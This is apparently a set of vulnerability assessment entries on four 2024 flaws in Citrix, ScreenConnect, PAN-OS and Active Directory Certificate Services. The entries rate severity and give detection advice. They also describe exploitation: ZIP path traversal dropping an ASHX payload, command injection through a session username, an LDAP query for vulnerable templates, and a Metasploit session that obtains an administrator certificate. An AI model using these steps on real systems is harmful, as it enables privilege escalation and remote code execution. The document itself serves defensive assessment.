CVE-2024-6235 is a critical information disclosure vulnerability in Citrix NetScaler Console. The vulnerability, which was patched in July of 2024, affects Citrix NetScaler Console 14.1 (also known as Citrix NetScaler ADM 14.1) before 14.1-25.53. A brief investigation of the vulnerability indicated that exploitability is lower than one might expect for a critical vulnerability in a Citrix product. It appears that exploitation requires an adjacent network position on the LAN, since the management web service for NetScaler Console/ADM does not appear to be affected. This indicates that CVE-2024-6235 is most likely to be exploited for lateral movement, likely via an agent communication service port or outbound LAN-focused discovery. Furthermore, no public PoC is available, as of December 5, 2024, and the vulnerability does not appear to be trivial to exploit; the vulnerability has not been reported as EITW. For these reasons, attacker value and exploitability have been deemed ‘Moderate’.

CVE-2024-1708 is a path traversal vulnerability affecting ConnectWise ScreenConnect. A technical analysis is available here.

The vulnerability occurs when installing a new extension (i.e. a plugin) on a vulnerable ScreenConnect target. An extension is delivered as a ZIP file, and an authenticated administrator can install a new extension by making a HTTP POST request to the /Services/ExtensionService.ashx/InstallExtension endpoint, supplying the contents of the ZIP as part of the request.

By default new extensions are stored in the folder C:\Program Files (x86)\ScreenConnect\App_Extensions\ on Windows, and /opt/screenconnect/App_Extensions/ on Linux. An extension will be identified on the system using a GUID, and will reside in the App_Extensions folder under a new folder named with the GUID value of the extension.

When installing a new extension, ScreenConnect extracts the contents of a ZIP file to the extensions GUID folder in the App_Extensions folder. However, ZIP file extraction honors double dot path segments (e.g. \..\ on Windows, or /../ on Linux), allowing arbitrary files held in the ZIP file to be extracted to arbitrary locations on the target system due to path traversal.

When writing the Metasploit exploit for CVE-2024-1709, I leveraged CVE-2024-1708, to write an attacker controlled ASHX (a form of ASP.NET) payload to the App_Extensions folder.

CISA rated this vulnerability with a CVSS score of 8.4 (High). Notably, their rating sets the User Interaction to be Required, and the Scope to be Changed. Based on my writing of the Metasploit exploit module, user interaction is not required. Additionally, the scope is not changed through this vulnerability, as this vulnerability is authenticated, and requires an attacker to already have administrator privileges, for example, via CVE-2024-1709. The vulnerability that gets an attacker administrator privileges (i.e. CVE-2024-1709) should be mark the Scope as Changed. A rating of 7.2 (High) would seem to better reflect the impact of CVE-2024-1708.

I have rated the exploitability of CVE-2024-1708 as Very High, as the steps to exploit the path traversal are both easy to perform and reliable in practice. I have rated the attacker value as High and not Very High, as this vulnerability requires authentication.

CVE-2024-9474 was exploited in the wild as part of an exploit chain, paired with the authentication bypass CVE-2024-0012, to allow for unauthenticated RCE. On its own, CVE-2024-9474 would require authentication.

A technical analysis of CVE-2024-9474 shows this vulnerability is a command injection, allowing an attacker to execute arbitrary OS commands with root privileges.

An attacker can make a POST request to the /php/utils/createRemoteAppwebSession.php endpoint, which will create a new PHP session, returning a new PHPSESSID cookie. This POST request allows an attacker to supply an arbitrary username for the new session. The username value will be stored in a session object. A second HTTP request, for example to /index.php, can then trigger the command injection when the function AuditLog.write is called, and the poisoned username value from the new session is passed to a call to pexecute, and a command injection can be achieved.

A Metasploit exploit module for the exploit chain comprising of the auth bypass CVE-2024-0012, and the command injection CVE-2024-9474 is available. Based on writing this exploit module, I have rated both the attacker value, and the exploitability of this as high, as a target PAN-OS management interface is vulnerable in a default configuration, and compromising a PAN-OS device is a high value target for an attacker, however this vulnerability is authenticated so needs to be paired with an auth bypass.

This vulnerability is also known as ESC15 and EKUwu.

Overview

Microsoft’s Active Directory Certificate Services (AD CS) is affected by a vulnerability whereby certificate templates using schema version 1 allow the requester to specify the application policies in the form of OIDs to be included in the signed certificate. When combined with the ability to specify the the Certificate Request Agent OID (1.3.6.1.4.1.311.20.2.1) an attacker can request authentication certificates for any user using the built-in, default, User template. While the built-in, default WebServer template is technically vulnerable to this flaw, the default privileges restrict enrollment to the privileged Domain Admins and Enterprise Admins group. An attacker would need to identify a published certificate template that they have the necessary permission to enroll with that uses schema version 1. This is relatively easy to identify by using the following LDAP query and then inspecting the enrollment permissions.

(&
    (objectclass=pkicertificatetemplate)
    (!(mspki-enrollment-flag:1.2.840.113556.1.4.804:=2))
    (|(mspki-ra-signature=0)(!(mspki-ra-signature=*)))
    (pkiextendedkeyusage=*)
    (mspki-certificate-name-flag:1.2.840.113556.1.4.804:=1)
    (mspki-template-schema-version=1)
)

IOCs

When certificates are issued, a record is kept on the CA. An administrator can view issued certificates using certsrv.msc, navigating to the CA then selecting “Issued Certificates”. Look for the Certificate template that is vulnerable and inspect instances in which it was issued as these could indicate a malicious users has leveraged this flaw.

Disclosure

The vulnerability was first hinted at on the X (formerly Twitter) social media platform by the members of the TrustedSec team who discovered it. Through private conversations, the details began to slowly leak to a larger audience. The details became public on October 7th, 2024 when dru1d-foofus opened a pull request containing a functioning PoC to the popular Certipy repository. The next day, TrustedSec released a blog and detailed writeup regarding the vulnerability. At this time it was unclear whether or not Microsoft would issue a CVE for the vulnerability. Most ESC flaws have not had CVEs issued to identify them. On November 12th, 2024 Microsoft released a patch for this flaw which they issued as CVE-2024-49019.

Exploitation

This vulnerability is exploitable with Metasploit version 6.4.32 using the icpr_cert module and the ADD_CERT_APP_POLICY datastore option.

msf6 auxiliary(admin/dcerpc/icpr_cert) > set RHOSTS 172.30.239.85
RHOSTS => 172.30.239.85
msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBUser normaluser
SMBUser => normaluser
msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBDomain COLLALABS1
SMBDomain => COLLALABS1
msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBPass normalpass
SMBPass => normalpass
msf6 auxiliary(admin/dcerpc/icpr_cert) > set CA collalabs1-SRV-ADDS01-CA
CA => collalabs1-SRV-ADDS01-CA
msf6 auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE ESC15-Test
CERT_TEMPLATE => ESC15-Test
msf6 auxiliary(admin/dcerpc/icpr_cert) > set ADD_CERT_APP_POLICY 1.3.6.1.4.1.311.20.2.1
ADD_CERT_APP_POLICY => 1.3.6.1.4.1.311.20.2.1
msf6 auxiliary(admin/dcerpc/icpr_cert) > run
[*] Running module against 172.30.239.85
[*] 172.30.239.85:445 - Requesting a certificate...
[+] 172.30.239.85:445 - The requested certificate was issued.
[*] 172.30.239.85:445 - Certificate UPN: administrator@collalabs1.local
[*] 172.30.239.85:445 - Certificate Policies:
[*] 172.30.239.85:445 -   * 1.3.6.1.4.1.311.20.2.1 (Certificate Request Agent)
[*] 172.30.239.85:445 - Certificate stored at: /home/normaluser/.msf4/loot/20241009172714_default_172.30.239.85_windows.ad.cs_659672.pfx
[*] Auxiliary module execution completed
msf6 auxiliary(admin/dcerpc/icpr_cert) >